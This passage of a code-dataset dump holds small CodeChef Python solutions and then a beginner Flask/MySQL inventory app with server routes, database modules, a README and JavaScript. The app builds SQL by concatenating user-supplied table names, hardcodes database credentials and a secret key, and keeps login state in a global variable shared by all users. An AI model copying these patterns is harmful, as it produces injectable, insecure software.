"text": "N = int(input())\r\ncount = 0\r\ni = 1\r\nwhile i**2 <= N:\r\n\tif N%i == 0 :\r\n\t\tcount += 1\r\n\ti += 1\r\nif count == 1 and N!= 1 :\r\n\tprint(1)\r\nelse :\r\n\tprint(0)"
},
{
"alpha_fraction": 0.31496062874794006,
"alphanum_fraction": 0.34645670652389526,
"avg_line_length": 16.428571701049805,
"blob_id": "43b512d04d52c8de370693ad738dfc8bbf1352e9",
"content_id": "2ee823d5359e617e36c243fe13d1be57131a172c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/PEC2021A/RNGEODD.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "L , R = map(int , input().split())\r\nwhile L <= R:\r\n if L%2==0:\r\n L += 1 \r\n else:\r\n print(L)\r\n L += 2"
},
{
"alpha_fraction": 0.4150943458080292,
"alphanum_fraction": 0.44025155901908875,
"avg_line_length": 14.100000381469727,
"blob_id": "dda36d8cabdeb2352ee60291227cc4c666767cb6",
"content_id": "e93463c88ab76027c68f3c5cdd6d0a2afdaf9c83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 10,
"path": "/PEC2021C/PREFMAX.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "max , cnt = 0 , 0\r\n\r\nfor i in range(int(input())):\r\n num = int(input())\r\n if num > max:\r\n cnt += 1 \r\n max = num\r\n \r\nprint(2)\r\nprint(cnt)"
}
] | 20 |
sankarsubramaniankvs/hybrowlabs | https://github.com/sankarsubramaniankvs/hybrowlabs | 58883762d818b4bfd05887fbcdbfc3d0228b2bf4 | aafa7e377803e29f60bbac98ba783c3d7608e6da | 76e9adf3a12b66f523ca9023608c7925d82e9f92 | refs/heads/main | 2023-05-11T07:59:24.621389 | 2021-06-06T05:44:11 | 2021-06-06T05:44:11 | 374,277,158 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5034116506576538,
"alphanum_fraction": 0.5069497227668762,
"avg_line_length": 32.18260955810547,
"blob_id": "c642891db4b96a49b9abc03ff02e5b411c12ef33",
"content_id": "2f6dd0464691644a09419997fded02146eb9a2bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3957,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 115,
"path": "/api/locations.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\n\r\nclass location:\r\n def get_location_products(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM '+ name)\r\n r = cursor.fetchall()\r\n return r\r\n def location_edit(id,name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n sql = \"UPDATE locations SET name=%s WHERE ID=%s\"\r\n val = (name,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def location_add(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS locations(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS \"+name+ \"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\")\r\n cursor.execute('SELECT * FROM locations;')\r\n r = cursor.fetchall()\r\n f=1\r\n for i in r:\r\n if i[1]==name:\r\n f=0\r\n break\r\n if(f):\r\n l = len(r)+1\r\n sql = \"INSERT INTO locations(id,name) VALUES (%s,%s)\"\r\n val = (l,name)\r\n cursor.execute(sql,val)\r\n mydb.commit()\r\n return 'Location Added Successfully'\r\n else:\r\n return 'Location Exists!'\r\n\r\n def get_locations():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS locations(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute('SELECT * FROM locations;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM locations WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def location_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM locations;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def location_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute(\"SELECT name FROM locations WHERE id=%s OR id=%s;\",(id,id))\r\n name=cursor.fetchone()\r\n cursor.execute('DROP TABLE '+name[0])\r\n sql = \"DELETE FROM locations WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM locations;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE locations')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO locations(id,name) VALUES(%s,%s);\"\r\n val = (d,i[1])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.5719966888427734,
"alphanum_fraction": 0.5743165016174316,
"avg_line_length": 26.53900718688965,
"blob_id": "b2bd33f9b1bd7ca2e644b0ff8d41e4b29e692a9a",
"content_id": "3f0bec4d29cbf2e182f4b7abd498222c0f3219b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12070,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 423,
"path": "/server.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, session, jsonify,url_for,abort\r\nfrom api.signin import user_signin\r\nfrom api.change_password import change_pass \r\nfrom api.products import product as p\r\nfrom api.locations import location as l\r\nfrom api.movements import movement as m\r\n\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'secretkey'\r\nsession=False \r\nsession_user = '1'\r\nproduct=''\r\nlocation=''\r\nlocation_products=''\r\nmovement=''\r\n\r\[email protected]('/',methods=['GET'])\r\[email protected]('/login',methods=['GET'])\r\ndef login_page():\r\n return render_template(\"login.html\")\r\n\r\n\r\[email protected]('/auth',methods=['POST'])\r\ndef authenticate():\r\n global session, session_user\r\n if(request.method=='POST'):\r\n data = request.get_json()\r\n username = data.get('username')\r\n password = data.get('password')\r\n r=user_signin.authenticate_user(username,password)\r\n if(r=='success'):\r\n session=True\r\n session_user = username \r\n return r\r\[email protected]('/loginredirect',methods=['GET'])\r\ndef login_redirect():\r\n global session,session_user\r\n if(session_user!='1' and session):\r\n return redirect(f\"/user_dashboard/{session_user}\")\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/user_dashboard/<username>',methods=['POST','GET'])\r\ndef dashboard(username):\r\n global session,session_user\r\n if(session and session_user==username):\r\n return render_template('dashboard.html')\r\n else:\r\n session=False\r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/password_setting',methods=['POST','GET'])\r\ndef password_route():\r\n global session, session_user\r\n if(session_user!=1 and session):\r\n return redirect(f\"/change_password/{session_user}\")\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/change_password/<username>',methods=['POST','GET'])\r\ndef change_password(username):\r\n global session, session_user\r\n if(session and session_user==username):\r\n return render_template('change_password.html')\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/change_pass', methods=['POST'])\r\ndef change():\r\n global session,session_user\r\n\r\n if(request.method=='POST' and session):\r\n data = request.get_json()\r\n current = data.get('current')\r\n new = data.get('new')\r\n confirm = data.get('confirm')\r\n return change_pass.change(session_user,confirm,current)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\n\r\n\r\[email protected]('/products', methods=['POST','GET'])\r\ndef products():\r\n global session,session_user\r\n if(session):\r\n products = p.get_products()\r\n return render_template('products.html',products = products)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/add_product',methods=['POST','GET'])\r\ndef add_product():\r\n global session,session_user\r\n if(session):\r\n return render_template('add_product.html')\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/add_location',methods=['POST','GET'])\r\ndef add_location():\r\n global session,session_user\r\n if(session):\r\n return render_template('add_location.html')\r\n else:\r\n 
session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/add_movement',methods=['POST','GET'])\r\ndef add_movement():\r\n global session,session_user\r\n if(session):\r\n products = p.get_products()\r\n locations = l.get_locations()\r\n return render_template('add_movement.html',products=products,locations=locations)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/product_add',methods=['POST'])\r\ndef product_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n product = data.get('name')\r\n return p.product_add(product)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_add',methods=['POST'])\r\ndef location_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n location = data.get('name')\r\n return l.location_add(location)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_add',methods=['POST'])\r\ndef movement_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n fr = data.get('from')\r\n to = data.get('to')\r\n product = data.get('product')\r\n quantity = data.get('quantity')\r\n print(fr,to,product,quantity)\r\n r= m.movement_add(fr,to,product,quantity)\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/product_id_list',methods=['POST'])\r\ndef product_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=p.product_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_id_list',methods=['POST'])\r\ndef location_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=l.location_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_id_list',methods=['POST'])\r\ndef movement_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=m.movement_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/product_edit_id',methods=['POST'])\r\ndef find_product():\r\n global session,product\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n product = p.get(id)\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_edit_id',methods=['POST'])\r\ndef find_location():\r\n global session,location\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n location = l.get(id)\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_edit_id',methods=['POST'])\r\ndef find_movement():\r\n global session,movement,location,product\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n\r\n movement = m.get(id)\r\n\r\n\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n 
return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_view_id',methods=['POST'])\r\ndef view_id_location():\r\n global session,location,location_products,location\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('name')\r\n location=id\r\n r = l.get_location_products(id)\r\n location_products=r\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/location_view_page',methods=['GET','POST'])\r\ndef view_location():\r\n global session, location_products\r\n if(session):\r\n return render_template('location_view.html',location=location,items=location_products)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n \r\n\r\[email protected]('/product_edit_page',methods=['POST','GET'])\r\ndef product_edit():\r\n global product\r\n return render_template('edit_product.html',product=product)\r\n\r\[email protected]('/location_edit_page',methods=['POST','GET'])\r\ndef location_edit():\r\n global location\r\n return render_template('edit_location.html',location=location)\r\n\r\[email protected]('/movement_edit_page',methods=['POST','GET'])\r\ndef movement_edit():\r\n global movement\r\n products = p.get_products()\r\n locations = l.get_locations()\r\n return render_template('edit_movement.html',movement=movement,products=products,locations=locations)\r\n\r\n\r\[email protected]('/product_edit_function',methods=['POST'])\r\ndef product_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n name = data.get('name')\r\n p.product_edit(id,name)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\[email protected]('/location_edit_function',methods=['POST'])\r\ndef location_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n name = data.get('name')\r\n l.location_edit(id,name)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\[email protected]('/movement_edit_function',methods=['POST'])\r\ndef movement_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n fr = data.get('from')\r\n to = data.get('to')\r\n pid = data.get('product')\r\n qty = data.get('quantity')\r\n m.movement_edit(id,fr,to,pid,qty)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\n\r\[email protected]('/product_delete',methods=['POST'])\r\ndef product_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return p.product_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_delete',methods=['POST'])\r\ndef location_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return l.location_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/movement_delete',methods=['POST'])\r\ndef movement_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return m.movement_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return 
redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/locations',methods=['POST','GET'])\r\ndef locations():\r\n global session,session_user\r\n if(session):\r\n locations = l.get_locations()\r\n return render_template('locations.html',locations = locations)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/movements',methods=['POST','GET'])\r\ndef movements():\r\n global session,session_user\r\n if(session):\r\n movements = m.get_movements()\r\n return render_template('movements.html',movements = movements) \r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)"
},
{
"alpha_fraction": 0.6849315166473389,
"alphanum_fraction": 0.6849315166473389,
"avg_line_length": 14.44444465637207,
"blob_id": "ebc052cf8dfe5ffbef467a2ff483d14da2561578",
"content_id": "261f4999febb39a99b95ffa5b6f5b0c1f83c8a6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/api/connection.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\"\r\n)\r\n\r\nprint(mydb)"
},
{
"alpha_fraction": 0.5742630362510681,
"alphanum_fraction": 0.5753968358039856,
"avg_line_length": 26.03174591064453,
"blob_id": "27e74423683f77502524c08ddcdc48a36cb61161",
"content_id": "9b999dee2639547aebd78e90f35b5efac0a2e2d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 63,
"path": "/static/edit_product.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('back-button').addEventListener('click', () => {\r\n document.location = '/products'\r\n});\r\n\r\n\r\ndocument.getElementById('edit-button').addEventListener('click', () => {\r\n pname = document.getElementById('name').value\r\n id = document.getElementById('id').innerText\r\n auth = document.getElementById('auth')\r\n console.log(pname, id)\r\n if (pname == '') {\r\n auth.innerHTML = 'Product Name Cannot be empty!'\r\n }\r\n else {\r\n const data = { 'id': id, 'name': pname }\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST', '/product_edit_function', true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if (r == 'success') {\r\n auth.innerHTML = r\r\n auth.style['color'] = 'green'\r\n }\r\n\r\n }\r\n xhr.send(JSON.stringify(data))\r\n };\r\n\r\n\r\n\r\n})\r\n\r\ndocument.addEventListener('keypress', function (event) {\r\n if (event.keyCode == 13) {\r\n pname = document.getElementById('name').value\r\n id = document.getElementById('id').innerText\r\n auth = document.getElementById('auth')\r\n console.log(pname, id)\r\n if (pname == '') {\r\n auth.innerHTML = 'Product Name Cannot be empty!'\r\n }\r\n else {\r\n const data = { 'id': id, 'name': pname }\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST', '/product_edit_function', true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if (r == 'success') {\r\n auth.innerHTML = r\r\n auth.style['color'] = 'green'\r\n }\r\n\r\n }\r\n xhr.send(JSON.stringify(data))\r\n\r\n\r\n }\r\n }\r\n})"
},
{
"alpha_fraction": 0.6409691572189331,
"alphanum_fraction": 0.6453744769096375,
"avg_line_length": 23.22222137451172,
"blob_id": "2e80c00315c4ab9e309a0d64092658ffc393090b",
"content_id": "247c4b8c137f766315aa92676435e002cfd596de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 454,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 18,
"path": "/api/list_user.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom crypto import cryptography as e\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\ncursor = mydb.cursor()\r\ncursor.execute('SELECT * FROM users;')\r\nd=cursor.fetchone()\r\nprint(e.decrypt(d[0]))\r\nprint(e.check('administrator',d[1]))\r\nprint(cursor.rowcount, \"record inserted.\")\r\n\r\ncursor.close() \r\nmydb.close()\r\n"
},
{
"alpha_fraction": 0.5231316685676575,
"alphanum_fraction": 0.8167259693145752,
"avg_line_length": 40.62963104248047,
"blob_id": "4a059fc12eb21f6d2bf7ec0ad51df6a66cba8e1d",
"content_id": "b3ad31a7ecc4c66e15f07f0f841570263b7cd686",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 27,
"path": "/README.md",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "# hybrowlabs\nSample Project\n\nvideo-demo:\nhttps://user-images.githubusercontent.com/48561545/120913839-c9aff980-c6b7-11eb-98bc-d89e528a45f6.mp4\n\nlogin:page:\n\n\nchange-password-page:\n\n\ndashboard-page:\n\n\nproducts-page:\n\n\nproduct-edit-page:\n\n\n\nmovements-page:\n\n\nadd-movement-page:\n\n"
},
{
"alpha_fraction": 0.559116780757904,
"alphanum_fraction": 0.5683760643005371,
"avg_line_length": 22.13793182373047,
"blob_id": "733971b30a98448c472bea023ae6beef43c80299",
"content_id": "033b61298c70740a765e629e08af3aaabd7712a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1404,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 58,
"path": "/static/products.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "function edit(){\r\n id=this.getAttribute('name')\r\n var xhr1 = new XMLHttpRequest();\r\n xhr1.open('POST','/product_edit_id',true);\r\n xhr1.setRequestHeader('Content-type', 'application/json');\r\n xhr1.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/product_edit_page'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr1.send(JSON.stringify(data)) \r\n\r\n}\r\n\r\nfunction del(){\r\n id=this.getAttribute('name')\r\n console.log('delete-clicked')\r\n var xhr2 = new XMLHttpRequest();\r\n xhr2.open('POST','/product_delete',true);\r\n xhr2.setRequestHeader('Content-type', 'application/json');\r\n xhr2.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/products'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr2.send(JSON.stringify(data))\r\n\r\n}\r\n\r\n\r\n\r\n\r\nfunction init(){\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('POST','/product_id_list',true);\r\nxhr.setRequestHeader('Content-type', 'application/json');\r\nxhr.onload = function () {\r\n r=this.responseText\r\n r = parseInt(r) \r\n var i \r\n for(i=1;i<=r;i++){\r\n t='edit-'+i.toString()\r\n document.getElementById(t).onclick = edit;\r\n t1='delete-'+i.toString() \r\n document.getElementById(t1).onclick = del;\r\n }\r\n\r\n }\r\n\r\ndata = {'data':'data'}\r\nxhr.send(JSON.stringify(data))\r\n}\r\n\r\ninit()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6840490698814392,
"alphanum_fraction": 0.6840490698814392,
"avg_line_length": 27.636363983154297,
"blob_id": "62fd094b6d3a8161dd345d9dc204b3050cec683b",
"content_id": "28ce072bd224af6120a923fe5b215345314c6ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 11,
"path": "/static/dashboard.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('products').addEventListener('click', ()=>{\r\n window.location='/products'\r\n})\r\n\r\ndocument.getElementById('locations').addEventListener('click', ()=>{\r\n window.location='/locations'\r\n})\r\n\r\ndocument.getElementById('movements').addEventListener('click', ()=>{\r\n window.location='/movements'\r\n})\r\n"
},
{
"alpha_fraction": 0.48685404658317566,
"alphanum_fraction": 0.4895738959312439,
"avg_line_length": 28.47222137451172,
"blob_id": "b1b04f2153db6f103293c19377ac8ea5227632bb",
"content_id": "392d021b61af599b40e7f5359b2d4c64519ecf69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 36,
"path": "/api/change_password.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom .crypto import cryptography as e\r\n\r\nclass change_pass:\r\n def change(username,new,old):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n mydb.autocommit = True\r\n\r\n cursor = mydb.cursor() \r\n\r\n cursor.execute('SELECT * FROM users;')\r\n user = cursor.fetchone()\r\n cursor.close()\r\n cursor = mydb.cursor()\r\n res='' \r\n if e.decrypt(user[0]) == username:\r\n if( e.check(old,user[1])):\r\n username = user[0]\r\n new = e.hash(new)\r\n sql=\"\"\"UPDATE users SET password = %s WHERE username = %s\"\"\";\r\n val=(new,username)\r\n cursor.execute(sql,val)\r\n res= 'Password change successful'\r\n else:\r\n res= 'Current password incorrect!'\r\n else:\r\n res='User not found!'\r\n mydb.commit()\r\n cursor.close()\r\n mydb.close()\r\n return res\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5409924387931824,
"alphanum_fraction": 0.5420712232589722,
"avg_line_length": 27.935483932495117,
"blob_id": "6869aab6572e78ab2924096fafddbca85df61d32",
"content_id": "289597c73ea3cff3e63c30d274902d8fae7bd30c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1854,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 62,
"path": "/static/add_location.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('add-button').addEventListener('click',()=>{\r\n lname = document.getElementById('name').value \r\n auth = document.getElementById('auth')\r\n if(lname==''){\r\n auth.innerHTML = 'Location Name Cannot be empty!'\r\n }\r\n else{\r\n const locationname = {'name': lname}\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/location_add',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='Location Exists!'){\r\n auth.innerHTML=r \r\n auth.style['color'] = \"red\";\r\n }\r\n else{\r\n auth.innerHTML=r;\r\n auth.style['color'] = \"green\";\r\n\r\n }\r\n };\r\n xhr.send(JSON.stringify(locationname))\r\n }\r\n});\r\n\r\ndocument.getElementById('back-button').addEventListener('click', ()=>{\r\n document.location ='/locations'\r\n});\r\n\r\n\r\ndocument.addEventListener('keypress',function(event){\r\n if(event.keyCode==13){\r\n lname = document.getElementById('name').value \r\n auth = document.getElementById('auth')\r\n if(lname==''){\r\n auth.innerHTML = 'Location Name Cannot be empty!'\r\n }\r\n else{\r\n const locationname = {'name': lname}\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/location_add',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='Location Exists!'){\r\n auth.innerHTML=r \r\n auth.style['color'] = \"red\";\r\n }\r\n else{\r\n auth.innerHTML=r;\r\n auth.style['color'] = \"green\";\r\n \r\n }\r\n };\r\n xhr.send(JSON.stringify(locationname))\r\n }\r\n\r\n }});"
},
{
"alpha_fraction": 0.56695157289505,
"alphanum_fraction": 0.5754985809326172,
"avg_line_length": 21.426666259765625,
"blob_id": "050b5086d8fa2aa011ee2c7cbee74549498df94f",
"content_id": "34609b288e703a2a1f11e689fafdaac2fd90a2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1755,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 75,
"path": "/static/movements.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "function edit(){\r\n id=this.getAttribute('name')\r\n var xhr1 = new XMLHttpRequest();\r\n xhr1.open('POST','/movement_edit_id',true);\r\n xhr1.setRequestHeader('Content-type', 'application/json');\r\n xhr1.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/movement_edit_page'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr1.send(JSON.stringify(data)) \r\n\r\n}\r\n\r\nfunction del(){\r\n id=this.getAttribute('name')\r\n console.log('delete-clicked')\r\n var xhr2 = new XMLHttpRequest();\r\n xhr2.open('POST','/movement_delete',true);\r\n xhr2.setRequestHeader('Content-type', 'application/json');\r\n xhr2.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/movements'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr2.send(JSON.stringify(data))\r\n\r\n}\r\n\r\n\r\n\r\n\r\nfunction init(){\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('POST','/movement_id_list',true);\r\nxhr.setRequestHeader('Content-type', 'application/json');\r\nxhr.onload = function () {\r\n r=this.responseText\r\n console.log(r)\r\n r = parseInt(r) \r\n var i \r\n for(i=1;i<=r;i++){\r\n t='edit-'+i.toString()\r\n document.getElementById(t).onclick = edit;\r\n t1='delete-'+i.toString() \r\n document.getElementById(t1).onclick = del;\r\n 